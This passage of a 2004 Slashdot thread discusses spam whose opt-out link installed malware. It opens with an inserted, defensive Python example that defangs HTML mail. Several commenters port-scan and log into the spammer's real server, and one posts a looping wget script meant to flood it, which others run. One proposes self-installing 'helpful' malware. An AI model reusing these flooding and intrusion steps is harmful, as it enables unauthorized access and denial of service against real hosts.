      That is mostly the way I use it, disabling html, checking attached files for virus, and the windows executable extensions that passed the antivirus check get renamed anyway to make them not executable without strong user action. Attached HTML pages sometimes don't look/work as desired, but I do not have to worry about someone receiving this particular piece of spam.
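
Added example (not part of any comment in this thread, and not code from MIMEDefang or Anomy Sanitizer): the "disable active HTML content" idea from comment 15, together with the IMG-tag point from comment 13.2, as Python that renders an HTML mail part as inert text and reports what it neutralized. The sample message, its `bulk.example`/`corp.example` domains and all function names are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.utils import parseaddr
from html.parser import HTMLParser
from urllib.parse import unquote

ACTIVE_TAGS = {"script", "style", "object", "applet", "iframe", "embed"}
BLOCK_TAGS = {"p", "div", "br", "tr", "li"}


def defang(url):
    """Make a URL non-clickable: http -> hxxp, '.' -> '[.]'."""
    if url.lower().startswith("http"):
        url = "hxxp" + url[4:]
    return url.replace(".", "[.]")


class MailDefanger(HTMLParser):
    def __init__(self, recipient=""):
        super().__init__(convert_charrefs=True)
        self.recipient = recipient.lower()
        self.out, self.findings = [], []
        self._skip = 0        # nesting depth inside ACTIVE_TAGS
        self._href = None     # href of the <a> currently open

    def _note_url(self, kind, url):
        self.findings.append((kind, defang(url)))
        # A URL that carries the recipient's address confirms it to the sender.
        if self.recipient and self.recipient in unquote(url).lower():
            self.findings.append(("address-leak", defang(url)))

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag in ACTIVE_TAGS:
            self.findings.append(("active-content", tag))
            if tag != "embed":             # <embed> is void: no content to skip
                self._skip += 1
            return
        if self._skip:
            return
        for name in attrs:
            if name.startswith("on"):      # onload, onmousedown, ondragstart, ...
                self.findings.append(("event-handler", f"{tag}.{name}"))
        if tag == "img":
            src = attrs.get("src") or ""
            if src.lower().startswith(("http://", "https://", "//")):
                self._note_url("remote-image", src)
                self.out.append("[remote image blocked]")
        elif tag == "a":
            self._href = attrs.get("href")
        elif tag in BLOCK_TAGS:
            self.out.append("\n")

    def handle_endtag(self, tag):
        if tag in ACTIVE_TAGS and tag != "embed":
            self._skip = max(0, self._skip - 1)
        elif tag == "a" and self._href:
            self._note_url("link", self._href)
            self.out.append(f" <{defang(self._href)}>")
            self._href = None

    def handle_data(self, data):
        if not self._skip:
            self.out.append(data)


def defang_message(raw):
    """Return (inert_text, findings) for a raw RFC 822 message."""
    msg = message_from_bytes(raw, policy=policy.default)
    recipient = parseaddr(str(msg.get("To", "")))[1]
    html_part = msg.get_body(preferencelist=("html",))
    if html_part is None:                  # no HTML part: plain text is inert
        plain = msg.get_body(preferencelist=("plain",))
        return (plain.get_content() if plain else ""), []
    parser = MailDefanger(recipient)
    parser.feed(html_part.get_content())
    parser.close()
    return "".join(parser.out).strip(), parser.findings


# Constructed sample message (not taken from the spam discussed in the thread).
SAMPLE = b"""\
From: offers@bulk.example
To: Alice <alice@corp.example>
Subject: Special offer
MIME-Version: 1.0
Content-Type: text/html; charset="us-ascii"

<html><body onload="track()">
<script>window.open('http://bulk.example/pop')</script>
<p>Special offer!</p>
<img src="http://bulk.example/o.gif?id=alice@corp.example">
<p><a href="http://bulk.example/remove?e=alice%40corp.example">Click here to remove</a></p>
</body></html>
"""

if __name__ == "__main__":
    text, findings = defang_message(SAMPLE)
    print(text, *findings, sep="\n")
```
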

  16. Exploit by jargoone · · Score: 5, Informative

    The article didn't give much explanation about the drag-and-drop exploit itself. Understandably, given the audience, but I was curious. Here's a good link: http://xforce.iss.net/xforce/xfdb/13679

  17. DNS blacklist is pretty severe by davidwr · · Score: 1

    Blacklisting from DNS by anyone other than the domain-owner or the DNS-server-owner should not be easy.

    The real question is why the people providing connectivity haven't pulled the plug at least temporarily. Any REPUTABLE provider would.

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
    1. Re:DNS blacklist is pretty severe by Anonymous Coward · · Score: 0

      Simple, Hinet Taiwan isn't a reputable provider. They're a spam/warez/script kiddy host.

    2. Re:DNS blacklist is pretty severe by davidwr · · Score: 1

      Who's their upstream? They're the ones to kick off.

      As far as DNS-blackballing "black hat" hosts go, that needs to be done independently of the official DNS tables.

      Nothing says you can't start a "webRBL" blackhole list similar to the spam-port-25 RBLs and encourage ISPs and companies to use your service. In fact, if it's not already being done I'd encourage you to do so.

      Just don't pretend to be "official."

      --
      Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
    3. Re:DNS blacklist is pretty severe by robslimo · · Score: 1

      alter.net is the upstream. If I recall correctly, they have a bit of a reputation

      traceroute

      3 164.58.10.65
      4 164.58.10.213
      5 164.58.10.222
      6 [64.200.104.89]
      7 64.200.105.58
      8 [64.200.110.82]
      9 GigabitEthernet4-0.GW2.DFW13.ALTER.NET [157.130.30.249]
      10 0.so-1-0-0.cl2.dfw13.alter.net [152.63.103.230]
      11 0.so-0-0-0.tl2.dfw9.alter.net [152.63.2.181]
      12 0.so-5-0-0.tl2.lax9.alter.net [152.63.0.58]
      13 0.so-4-0-0.cl2.lax15.alter.net [152.63.116.106]
      14 pos5-0.gw1.lax15.alter.net [152.63.115.213]
      15 hinet-gw.customer.alter.net [208.222.12.234]
      16 kh-c12r31.router.hinet.net [211.22.225.174]
      17 kh-c12r1.router.hinet.net [211.22.225.129]
      18 tp-s2-c12r1.router.hinet.net [210.65.2.34]
      19 tp-e4-c12r1.router.hinet.net [210.65.2.129]
      20 tp-e4-c6r5.router.hinet.net [211.22.36.41]
      21 h201.s100.ts.hinet.net [168.95.100.201]
      23 61-218-79-53.hinet-ip.hinet.net [61.218.79.53]

      Trace complete.

      Too bad the filter itself is so lame. I had to add a whole bunch of meaningless verbal meanderings to get this post through it.

  18. interesting ports on the spammer's site by Indy1 · · Score: 5, Interesting

    Starting nmap 3.70 ( http://www.insecure.org/nmap/ ) at 2004-09-22 09:54 MDT
    Interesting ports on 61-218-79-53.HINET-IP.hinet.net (61.218.79.53):
    (The 1651 ports scanned but not shown below are in state: closed)
    PORT STATE SERVICE
    21/tcp open ftp
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    135/tcp filtered msrpc
    443/tcp open https
    445/tcp filtered microsoft-ds
    3306/tcp open mysql
    6000/tcp open X11

    Nmap run completed -- 1 IP address (1 host up) scanned in 54.453 seconds

    --
    Lawyers, MBA's, RIAA? A jedi fears not these things!
    1. Re:interesting ports on the spammer's site by TCM · · Score: 3, Interesting

      $ telnet 61.218.79.53 22
      Trying 61.218.79.53...
      Connected to 61-218-79-53.HINET-IP.hinet.net.
      Escape character is '^]'.
      SSH-1.99-OpenSSH_3.5p1


      Hmm.. Isn't 3.5p1 vulnerable to some exploit? Not that I'm implying anything!

      --
      Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
    2. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0

      http://www.securityfocus.com/bid/4241/info/

      *lalala*

      - TCM's non-whoring alter ego

    3. Re:interesting ports on the spammer's site by caluml · · Score: 5, Interesting

      bash-2.05b$ mysql -h 61-218-79-53.HINET-IP.hinet.net
      Welcome to the MySQL monitor. Commands end with ; or \g.
      Your MySQL connection id is 658 to server version: 3.23.54

      Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

      mysql> show databases;
      +-----------------+
      | Database |
      +-----------------+
      | earth_bizzads |
      | herbalmarketing |
      | mysql |
      +-----------------+
      3 rows in set (0.45 sec)

      mysql>

    4. Re:interesting ports on the spammer's site by t35t0r · · Score: 1

      OH MAN YOU're not KIDDINg!!

    5. Re:interesting ports on the spammer's site by TCM · · Score: 2, Funny

      That link is for 3.1. Stupid AC must have confused 3.5 with 2.5.

      That AC is not me.

      *runs*

      --
      Of course it runs NetBSD. BTC: 1NT7QvbetmANwaMzhpVL6
    6. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0

      unfortunately the databases cannot be "used" without some sort of...

    7. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0

      Alas, that's the most one can do; access to actual databases is denied.

    8. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0
      Have you tried specifying a username? I'm too squeaky-clean to go logging in to other people's stuff...
      mysql -u root ...
    9. Re:interesting ports on the spammer's site by sfe_software · · Score: 2, Informative

      3306/tcp open mysql

      Interestingly they never disabled the default "test" user for MySQL. Not that much can be done (user "test" has no privileges on any databases) but I was in fact able to log in...

      --
      NGWave - Fast Sound Editor for Windows
    10. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 3, Interesting

      earth_bizzads
      Interesting, one of the string literals in the downloaded binary is "www.earthlabs.biz/sockproxy/rec.php", a database of infected clients perhaps?

    11. Re:interesting ports on the spammer's site by Aliencow · · Score: 1

      PORT STATE SERVICE VERSION
      21/tcp open ftp vsFTPd 1.1.3
      22/tcp open ssh OpenSSH 3.5p1 (protocol 1.99)
      80/tcp open http Apache httpd 2.0.40 ((Red Hat Linux))
      111/tcp open rpcbind 2 (rpc #100000)
      135/tcp filtered msrpc
      443/tcp open ssl/http Apache httpd 2.0.40 ((Red Hat Linux))
      3306/tcp open mysql MySQL 3.23.54
      6000/tcp open X11 (access denied)

    12. Re:interesting ports on the spammer's site by 5m477m4n · · Score: 2, Informative

      hmmm, their certificate, issued to SomeOrganization expires on 9/21/2004.

      --

      ---
      Those who can, do
      Those who can't, teach
      Those who don't know how, supervise
    13. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0
      $ mysql -u test -h 61-218-79-53.HINET-IP.hinet.net test
      Reading table information for completion of table and column names
      You can turn off this feature to get a quicker startup with -A

      Welcome to the MySQL monitor. Commands end with ; or \g.
      Your MySQL connection id is 1086 to server version: 3.23.54

      Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

      mysql> show tables;
      +----------------+
      | Tables_in_test |
      +----------------+
      | SPAMMERS_SUX0r |
      | w00t |
      +----------------+
      2 rows in set (0.94 sec)

      mysql>
      hehehehhehe
    14. Re:interesting ports on the spammer's site by ravydavygravy · · Score: 4, Funny
      Heh - this is what it looked like a few minutes ago...
      mysql> use test;
      Database changed
      mysql> show tables;
      +----------------+
      | Tables_in_test |
      +----------------+
      | SPAMMERS_SUX0r |
      | w00t |
      +----------------+
      2 rows in set (0.84 sec)
    15. Re:interesting ports on the spammer's site by BenjyD · · Score: 1

      Seems to be changing rapidly...

    16. Re:interesting ports on the spammer's site by Abalamahalamatandra · · Score: 1

      Except, on Red Hat, it may have been backpatched - still reporting the same version but the hole is closed.

    17. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0

      It would be a *real* shame if someone changed the index file of the apache server to a picture of goatse. That would stop people from clicking on "unsubscribe links" for a Loooong time!

    18. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0

      It also has BIND running, but it is bound to a different IP address on the machine (61.218.79.50), version 9.2.1, allows AXFR queries and is authoritative for the xcelent.biz zone, but nothing significant in there.

    19. Re:interesting ports on the spammer's site by Anonymous Coward · · Score: 0

      Eeeeeevul! but I like it...

    20. Re:interesting ports on the spammer's site by BillX · · Score: 2, Informative


      mysql> show databases;

      (snipped thanks to lameness filter)

      4 rows in set (11.56 sec)

      mysql> use test;
      Reading table information for completion of table and column names
      You can turn off this feature to get a quicker startup with -A
      ...and there it's been sitting for the past half hour or more. I love that 12-seconds just to display the list of DBs. Congratulations Slashdot, you slashdotted the spammer's sql server!

      --
      Caveat Emptor is not a business model.
    21. Re:interesting ports on the spammer's site by HSpirit · · Score: 1

      ...and (predictably) this is what it looks like now:

      % mysql -h 61-218-79-53.HINET-IP.hinet
      ERROR 1040: Too many connections

      Good to see the slashdot effect is portable to the MySQL protocol :)

    22. Re:interesting ports on the spammer's site by ocelotbob · · Score: 1

      When it all comes down to it, pretty much all slashdottings are from the database backend. Usually even modestly powered sites can handle a slashdotting with just a bit of slowness, if they keep the content simple and static.

      --

      Marxism is the opiate of dumbasses

  19. THIS IS GETTING OLD! by Anonymous Coward · · Score: 0, Offtopic

    Look at the links in the original post. Notice the added URL at the end of the supposed "Google invites" link? If you click on these you deserve what you get.

    Somewhere on this planet there is a bunch of fscking losers whose sole means to get satisfaction is to redirect newbs to shock sites à la goatse or tubgirl. How utterly pathetic.

    And I'm feeding them, I know, I know...

    1. Re:THIS IS GETTING OLD! by Anonymous Coward · · Score: 0

      The great thing is that you are helping me by drawing more attention to this thread when you get modded up. For the love of god, please continue to point out my links, you are only increasing my StatsMeasure rankings.

  20. "Scarily" by Anonymous Coward · · Score: 0, Informative

    not a word

    1. Re:"Scarily" by Anonymous Coward · · Score: 0
      Scarily

      adv : in an alarming manner; "the disturbing thing
      about the Minister's behavior is that far from
      being artificial, it too often rings
      frighteningly true" [syn: frighteningly]

      Dictionary.com disagrees with you.

    2. Re:"Scarily" by Sloppy · · Score: 1

      I protest. English may not be German, but we're still allowed to construct words.

      --
      As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  21. The only thing I click on in a Spam is... by vasqzr · · Score: 2, Informative


    The only thing you should be clicking on, in a spam message, is the delete icon/key.

    1. Re:The only thing I click on in a Spam is... by lintux · · Score: 1

      The only thing you should be clicking on, in a spam message, is the delete icon/key.

      Or, if you got a training spamfilter, the "Mark as Spam" button. :-)

    2. Re:The only thing I click on in a Spam is... by rawg · · Score: 1

      No, you should first forward it to spamcop.net, then to uce@ftc.gov.

      --
      The above is not worth reading.
  22. A SPAM opt-out trojan... by nologin · · Score: 2, Insightful
    ... that would turn your machine into a Spambot; now that would be funny. :)

    CAN-SPAM may require an opt-out option in the e-mail to remain legal. However, the legislation DOESN'T protect you from the consequences of using that opt-out option.

    It's legislated social engineering at its finest. Good luck out there.

    1. Re:A SPAM opt-out trojan... by gl4ss · · Score: 1

      well.. other legislation makes using such trickery illegal in most countries anyways.

      just because it's not in one law doesn't make it legal.

      --
      world was created 5 seconds before this post as it is.
  23. Not Surprising by Trolling4Dollars · · Score: 2, Insightful

    IT Geeks - 1
    Politicos without "tech savvy" - 0

    This is the way it will always be unfortunately. Unless the whole population eventually can understand all the technical aspects of computers and the internet, or computers and the internet become so rock solid/secure AND easy to use, it will always be this way.

    1. Re:Not Surprising by Anonymous Coward · · Score: 0

      IT Geeks - 1

      Politicos without "tech savvy" - 0

      Sending your rep a link to the site in a complaint about the CAN SPAM act - priceless

  24. Javascript console by saned · · Score: 2, Interesting

    Firefox's Javascript console reports many errors:

    Error: unterminated string literal Source File: http://focusin.ads.targetnet.com//ad/id=dmitryivan ov&opt=hjj&rw=468&rh=60&cv=220&uid=673 475 Line: 3, Column: 17 Source Code: document.writeln('

    Error: newPopup has no properties Source File: http://mediamgr.ugo.com/js.ng/Network=ugo&size=1x1 &adtype=over&affiliate=ultimate-guitar&suba=ultima te-guitar&channel=music&subchannel=tic&category=ti c&PT=ct&CR=ei&pez=tic Line: 11

    Error: document.getElementById("clientcall").click is not a function Source File: http://www.xcelent.biz/o/ Line: 74

    Error: event is not defined Source File: http://www.xcelent.biz/o/frame.html Line: 84

    ...and many more similar to this
    -P@

    --
    signal_connect(0, "test_top.dut.my_sig", "clk");
  25. well then... by Anonymous Coward · · Score: 1, Funny

    ... time to send one of these babies to each legislator....

  26. opt-out almost never works anyway by donbrock · · Score: 0
    Scarily the E-mail actually complies with the CAN-SPAM act as it only requires spammers to put an opt-out link in their mailings.

    I've been getting spam for years that have an opt-out option. The only problem is that it almost never works. It's usually a bad link or it may just display a screen that says you've been removed but I believe it's a dummy screen to make you think you've been removed.

  27. send it to the MCSE boys by codepunk · · Score: 3, Funny

    I just sent a link to that to the MCSE slags at work. How long till they figure out they just got owned.

    --


    Got Code?
    1. Re:send it to the MCSE boys by Anonymous Coward · · Score: 0

      They probably block all mail from you already - with a supercilious attitude like that you must be REAL unpopular..

    2. Re:send it to the MCSE boys by Anonymous Coward · · Score: 0

      Oh man you rock.

      I'm sending that link to the MCSE guys in the NOC and the Regional IT center.

      Dear IT professionals, I found this site that seems to try and entice users in our company to divulge information and or possibly infect our computers.

      can you investigate and protect us?

    3. Re:send it to the MCSE boys by Maestro4k · · Score: 2, Insightful
      • I just sent a link to that to the MCSE slags at work. How long till they figure out they just got owned.
      I predict about 5 minutes before they call security and 10 minutes before you get to clean out your desk and go home early. :)
  28. Slightly OT-Malicious spam opt-outs and MYPOINTS by CdBee · · Score: 3, Interesting

    I received an email from MyPoints asking me to activate an account set up on my Gmail address a few days ago, and hit the CAN-spam opt-out link (I hadn't signed up for it).

    Since then I'm getting a LOT of spam, I received none prior. All have the same recipient name as the Mypoints mail and some other common characteristics, but none of the opt-out stuff. Thankfully, gmail is autofiltering them without any need for intervention, but I can't help but feel MyPoints are behind it.

    Has anyone else had the same thing happen?

    --
    I have been a user for about 10 years. This ends Feb 2014. The site's been ruined. I'm off. Dice, FU
  29. Even better - choose a link with graphics on. by cliveholloway · · Score: 4, Informative
    After a little guessing:

    a b c d. "d" looks pretty heavy on graphics.

    .02

    cLive ;-)

    --
    -- Trinity in high heels carrying a whip: The donimatrix - there is no spoonerism
    1. Re:Even better - choose a link with graphics on. by tty21 · · Score: 1

      xcelent!! I think he's feeling the burn....

      --
      The quick brown fox jumped over the lazy dogs back 123456789
    2. Re:Even better - choose a link with graphics on. by Psychotext · · Score: 1

      Excellent... server seems to be slowly cooking already. :)

      --
      People that believe in their opinions don't post AC.
    3. Re:Even better - choose a link with graphics on. by Coward+Anonymous · · Score: 2, Insightful

      Don't forget the good services of SSL.


      You should use https for everything so that you get a b c d


    4. Re:Even better - choose a link with graphics on. by mod_parent_down · · Score: 1
      Or, you could just go report spam. They do NOT tolerate ANY spam.

      But they will need your email address.

    5. Re:Even better - choose a link with graphics on. by System.out.println() · · Score: 1

      Does using https cost the server more bandwidth?

    6. Re:Even better - choose a link with graphics on. by bigjocker · · Score: 1

      I'm hitting d like crazy with wget.

      At last, a good use for these useless scripts I have to bother my friends :)

      --
      Life isn't like a box of chocolates. It's more like a jar of jalapenos. What you do today, might burn your ass tomorrow.
    7. Re:Even better - choose a link with graphics on. by nkh · · Score: 1

      I'm sure you can be interested in this official windows update (39kb)

    8. Re:Even better - choose a link with graphics on. by Anonymous Coward · · Score: 0

      Please, do share your script. I am interested for, uh... academic reasons.

    9. Re:Even better - choose a link with graphics on. by Coward+Anonymous · · Score: 1

      No, but, barring a HW accelerator, it increases CPU load considerably.

    10. Re:Even better - choose a link with graphics on. by rasz · · Score: 1

      Four windows refreshing those links (ssl) working on full steam now.

    11. Re:Even better - choose a link with graphics on. by Anonymous Coward · · Score: 1, Interesting

      I'm not the grandparent poster but this one will do the trick. It's unethical but we can't help but to get pissed off at assholes like these once in a while now do we? :P

      #!/bin/sh
      wget --mirror -erobots=off --user-agent=`mcookie` -np https://www.xcelent.biz/d/
      find www.xcelent.biz/ -name *.jpg>urls
      while [ true ]; do
      for i in `cat urls`; do
      wget --user-agent=`mcookie` -O tmp https://$i
      rm tmp
      sleep 1
      done
      done

    12. Re:Even better - choose a link with graphics on. by Anonymous Coward · · Score: 0

      Hmm, how about reporting the spam with the first 10,000 digits of pi as a parameter instead of your email address?

    13. Re:Even better - choose a link with graphics on. by Anonymous Coward · · Score: 0

      Use this link:

    14. Re:Even better - choose a link with graphics on. by abirdman · · Score: 1

      Thank you AC! There are at least a dozen big graphics on that site. That should heat up their processors, and likely swallow some bandwidth as well. I adapted this a bit to D/L the exe as well, and it's running in text mode on a Linux box. This is the most fun I've had with my computer in a long time!

      --
      Everything I've ever learned the hard way was based on a statistically invalid sample.
  30. Well I went to look at the virus by 3terrabyte · · Score: 2, Informative
    I thought it would be neat to see how good their fake-jpeg scrollbar was, so I loaded the page. I had no plans on 'scrolling down'.

    Didn't get that far. Just loading the page launched it. Anti-virus kicked in with a warning, home page was attempted to change, and then I got a call from headquarters to follow the delousing drill, since they also get all of our warnings.

    Well that was fun. Didn't get to see any scroll bar :(

    Windows 2000 - IE 5.50.4807.2300

    --

    Why are there only 19 people folding@home for slashdot?

    1. Re:Well I went to look at the virus by Naikrovek · · Score: 2, Informative

      the scrollbar is the real IE scroll bar but there's an invisible image on top of it. When you click and drag you're actually dragging this image onto a small square that follows the mouse cursor - you can't avoid dropping it into that small image.

      the js code scrolls the page for you, instead of the actual scroll bar. since you're scrolling the page (via javascript) the real scroll bar reflects the new page position, making you think you actually were dragging the scroll bar.

      as you learned, the code doesn't need to be executed to trip the anti-virus. oddly enough my corporate anti-virus didn't catch a thing (it didn't tell me it did anyway), and when i dropped, the empty .exe was installed.

      I won't tell you where I work but I will tell you that it's a place where you don't want viruses or spyware getting at the very personal data we have on 1:4 of you. You all opted-in for the data collection too. (very large insurance company) I will tell you that we're mandated to use IE and Outlook. Firefox installations will get anyone in this company in deep trouble - thanks SCO, for promoting fear of open source for your own selfish gain!

  31. Why oh why by Anonymous Coward · · Score: 0

    Why are spammers so malicious? Maybe they're terrorists (half-joking). Should someone who gains unauthorized entry to millions of citizens' computers, and who burdens the economic infrastructure (Internet) with garbage be considered perhaps a terrorist?

    1. Re:Why oh why by Oddly_Drac · · Score: 1

      "Should someone who gains unauthorized entry to millions of citizens' computers, and who burdens the economic infrastructure (Internet) with garbage be considered perhaps a terrorist?"

      I didn't see mention of 'arab' in there.

      More seriously, doesn't this gel slightly with the windows Eula?

      --
      Oddly Draconis
      Too cynical to live, too stubborn to die.
    2. Re:Why oh why by Anonymous Coward · · Score: 0

      Are all terrorists Arabs?

    3. Re:Why oh why by Oddly_Drac · · Score: 1

      "Are all terrorists Arabs?"

      Only if you work in Homeland Security

      --
      Oddly Draconis
      Too cynical to live, too stubborn to die.
  32. Re:Slightly OT-Malicious spam opt-outs and MYPOINT by Anonymous Coward · · Score: 0
  33. Win32.Sokeven.D by davidwr · · Score: 2, Informative

    39,936 bytes
    Added to Computer Associates database 9/21/04

    What do other vendors call this?

    --
    Knowledge is how to play a game, intelligence is how to win, wisdom is knowing what game to play.
  34. Why is this a surprise? by mykepredko · · Score: 4, Insightful

    Seriously.

    It's not like spammers are a class of people to be trusted. I always felt the opt-out requirement was joke and prime for abuse. By opting out, you are telling the spammer that you read every email that comes your way and they add it to their list of email addresses that actually respond to spam.

    So what do they do with this list? If they follow the letter of the law, they will stop spamming - but, they have a list of high quality email IDs that they can sell to other spammers.

    Users should always follow these simple instructions with regards to email spam:

    1. Make sure you have an incoming mail spam filter, like SpamAssassin.
    2. Delete any spam that gets through.
    3. If you are interested in the product, do not contact the email (spam) source, reply to the email, click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it.

    myke

    1. Re:Why is this a surprise? by mdfst13 · · Score: 1

      "3. If you are interested in the product, do not contact the email (spam) source, reply to the email, click on "helpful" buttons. Find reputable mainstream vendors - if it's great then Wal-Mart, Best Buy, Circuit City, etc. will stock it."

      If you are interested, buy from a competitor. Note that under your system, it still makes sense for a manufacturer (e.g. the makers of Cialis, Levitra, or herbal substitutes) to support spam (either directly or through dealer incentives). E.g. if someone spams you to buy Levitra, buy some Viagra instead.

    2. Re:Why is this a surprise? by HikeFanatic · · Score: 0

      Ditto - I'm very surprised that this exploit hasn't been utilized earlier, considering the large number of people who go ahead and click on the so-called "opt-out" links. This in spite of the advice not to do so. I've already been telling my family to just delete the email.

      All it does is verify your email address for spammers. I just delete what SpamAssassin doesn't get rid of.

    3. Re:Why is this a surprise? by Anonymous Coward · · Score: 0

      Delete any spam that gets through.

      I've actually been saving all my spam since like 1995 or so. One day I'm hoping for payback in the form of legal action against all these dipshits.

    4. Re:Why is this a surprise? by crawling_chaos · · Score: 1

      You are assuming of course that what they are selling is actually Levitra or Cialis. Considering that at least 10% of the worldwide drug market is counterfeit, and that percentages can be as high as 60% in countries without strong drug regulators, you are more likely getting relabeled aspirin or a sugar pill.

      --
      You can only drink 30 or 40 glasses of beer a day, no matter how rich you are.
      -- Colonel Adolphus Busch
    5. Re:Why is this a surprise? by Maestro4k · · Score: 1
      • Seriously.

        It's not like spammers are a class of people to be trusted.

      I submitted the article and I can honestly say it isn't a surprise. It's newsworthy though because it shows a new vulnerability and one that's far easier to trick your average Windows luser into following. I really liked how The Reg really slammed the politicians and in one lovely sentence made utter fools out of them and their whole approach to spam. I suspect that we'll be hearing their take, or something very similar next time Congress decides to act on the spam problem again.

      What's really great is this little exploit and the way it's done really is going to take the wind out of the sails of the Direct Marketing Association. It's going to be hard to defend the practice of sending mails unless explicitly opted-in from now thanks to a spammer/virus writer. It should also make it clear to everyone the huge difference between junk mail (postal) and spam. Junk mail doesn't come with bombs that go off and destroy your mailbox when it arrives.

    6. Re:Why is this a surprise? by slappyjack · · Score: 1

      It's newsworthy though because it shows a new vulnerability and one that's far easier to trick your average Windows luser into following

      OK, the vulnerability is newsworthy, but yet another example of the behaviors of the drool-and-click crowd is just plain redundant. We KNOW they're stupid. Hell, THEY know they're stupid - they're just too lazy to care.

      Even better, this kind of thing makes some nice coin for people who go out and clean up Windows machines for $20 an hour.

      (Really, after this past year, friends get exactly ONE free checkup, then it costs them. Of course, the friend rate is payable in beers.)

  35. Re:Opt out now by Anonymous Coward · · Score: 0

    Mod down link whoring troll. Take your spam somewhere else, ya douche! And don't come crying to us when they don't give you your free crap.

  36. Why? by crotherm · · Score: 1


    Why, exactly, is anybody reading SPAM? It is not like you cannot tell just by looking at the subject and the From line.

    Secondly, why are people viewing emails as anything but text?

    --
    "Those who make peaceful revolution impossible, make violent revolution inevitable" - JFK
    1. Re:Why? by WormholeFiend · · Score: 1

      by default, the most popular email clients have HTML turned on, and the majority of people don't know you can view emails as text only, not to mention how to deactivate HTML email.

    2. Re:Why? by Anonymous Coward · · Score: 0

      I've had a huge influx of spam recently with subject lines like "meeting thursday at 4". I was about to delete one of them when I noticed it was not spam - but a real message with a subject line that just looked like spam.

    3. Re:Why? by Anonymous Coward · · Score: 0

      Even with thunderbird (at least the version that i have) it loads the images on selecting a new mail. And since i have to select every mail to rate them junk, it will load every image, thus give my mail address away to every spammer.....

      I guess i'm using an old version of thunderbird...

    4. Re:Why? by crotherm · · Score: 1


      Simple, don't have a message pane. On mine I have to double click an email to view it. It might be a pain in the arse, but it is safer.

      Also with thunderbird, you can choose not to load pictures if they are remotely hosted.

      --
      "Those who make peaceful revolution impossible, make violent revolution inevitable" - JFK
    5. Re:Why? by xouumalperxe · · Score: 1

      not wanting to be a Microsoft supporter here, but for the record, outlook (not sure about express) does that no-pic thing as well

  37. We need a productive exploit of this! by Anonymous Coward · · Score: 0

    What we need is a productive exploit of this. Here's how it works.

    Create a small .exe that pops up a window on the users machine the next time they reboot (this is how the exploit works).

    This .exe gets installed when they drag on any image that has the exploit tag added. These images can be added all over the web to lots and lots of websites.

    The user visits the site, clicks the image, the program gets installed, and the next time they reboot they get a very real looking message from Microsoft advising them to install Firefox because Internet Explorer is being abandoned as a non-profitable product.

    Voila', we've done them all a favor and patched their machines for them.

    The .exe could actually run every time the person's computer is rebooted, but only shows itself when the person doesn't have Firefox installed.

    It could also remap any IE shortcuts to Firefox...

  38. Hasn't this always been the case? by merlin_jim · · Score: 1

    You click the opt-out link, bad things happen. Before it was even more spam, now it's malicious attacks.

    How many people really trust spammers to honor an opt-out?

    --
    I am disrespectful to dirt! Can you see that I am serious?!
  39. Best port for a Slashdotting by Anonymous Coward · · Score: 1, Informative

    It is so much better to unsubscribe from this spam using the ssl connection (443). I checked, and it presents the same exploit page as the port 80 page with the benefit (for us) that it requires the extra computational resources of setting up an ssl session. Use the FOX and update often! https://61.218.79.53/o/

  40. MOD PARENT (with malicious address) DOWN! by kabloom · · Score: 2, Insightful

    This is dangerous stuff. Mod the parent article down (which includes a working link to the malicious address) so that people don't click on it.

    1. Re:MOD PARENT (with malicious address) DOWN! by FatSean · · Score: 0

      F that...if you read slashdot you should be smart enough to heed the warning. If you aren't, you get what's coming to you.

      Thanks anyway Mommy!

      --
      Blar.
    2. Re:MOD PARENT (with malicious address) DOWN! by darc · · Score: 2, Insightful

      Security via obscurity your thing? It makes no sense to hide stuff that can hurt you, rather than to be able to TELL what might. Your ostrich defense isn't very effective.

      --
      Tired of legitimate data sources? Try UNCYCLOPEDIA
  41. Wrong on so many counts by Anonymous Coward · · Score: 0

    SPAM Proposal Rejection Form

    This article advocates a

    ( ) technical (x) legislative ( ) market-based ( ) vigilante

    approach to fighting spam. Your idea will not work. Here is why it won't work.
    (One or more of the following may apply to your particular idea, and it may
    have other flaws which used to vary from state to state before a bad federal
    law was passed.)

    ( ) Spammers can easily use it to harvest email addresses
    (x) Mailing lists and other legitimate email uses would be affected
    (x) No one will be able to find the guy or collect the money
    ( ) It is defenseless against brute force attacks
    (x) It will stop spam for two weeks and then we'll be stuck with it
    (x) Users of email will not put up with it
    ( ) Microsoft will not put up with it
    ( ) The police will not put up with it
    (x) Requires too much cooperation from spammers
    (x) Requires immediate total cooperation from everybody at once
    ( ) Many email users cannot afford to lose business or alienate potential employers
    ( ) Spammers don't care about invalid addresses in their lists
    ( ) Anyone could anonymously destroy anyone else's career or business

    Specifically, your plan fails to account for

    ( ) Laws expressly prohibiting it
    (x) Lack of centrally controlling authority for email
    (x) Open relays in foreign countries
    ( ) Ease of searching tiny alphanumeric address space of all email addresses
    ( ) Asshats
    (x) Jurisdictional problems
    (x) Unpopularity of weird new taxes
    ( ) Public reluctance to accept weird new forms of money
    ( ) Huge existing software investment in SMTP
    ( ) Susceptibility of protocols other than SMTP to attack
    ( ) Willingness of users to install OS patches received by email
    (x) Armies of worm riddled broadband-connected Windows boxes
    ( ) Eternal arms race involved in all filtering approaches
    ( ) Extreme profitability of spam
    (x) Joe jobs and/or identity theft
    ( ) Technically illiterate politicians
    ( ) Extreme stupidity on the part of people who do business with spammers
    (x) Dishonesty on the part of spammers themselves
    ( ) Bandwidth costs that are unaffected by client filtering
    ( ) Outlook

    and the following philosophical objections may also apply:

